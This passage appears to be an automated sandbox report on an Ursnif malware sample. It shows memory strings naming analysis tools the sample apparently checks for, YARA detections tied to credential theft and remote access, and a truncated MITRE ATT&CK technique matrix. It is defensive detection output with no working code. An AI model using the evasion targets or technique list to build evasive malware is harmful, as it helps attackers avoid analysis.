            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: autoruns.exe
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000002.1728769965.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1102940599.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103658139.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103779305.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103257055.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103947110.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103515651.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103866848.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103987021.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5456, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000002.1728769965.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1102940599.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103658139.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103779305.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103257055.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103947110.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103515651.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103866848.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103987021.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5456, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation41Winlogon Helper DLLProcess Injection12Software Packing1Credential DumpingSystem Time Discovery1Remote File Copy3Data from Local SystemData Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Replication Through Removable MediaScripting121Port MonitorsAccessibility FeaturesScripting121Network SniffingAccount Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Cryptographic Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            External Remote ServicesExecution through API2Accessibility FeaturesPath InterceptionFile Deletion1Input CaptureSecurity Software Discovery321Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Drive-by CompromiseExploitation for Client Execution1System FirmwareDLL Search Order HijackingObfuscated Files or Information2Credentials in FilesFile and Directory Discovery3Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol4SIM Card SwapPremium SMS Toll Fraud
            Exploit Public-Facing ApplicationGraphical User Interface1Shortcut ModificationFile System Permissions WeaknessMasquerading11Account ManipulationSystem Information Discovery46Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion1Brute ForceVirtualization/Sandbox Evasion1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or D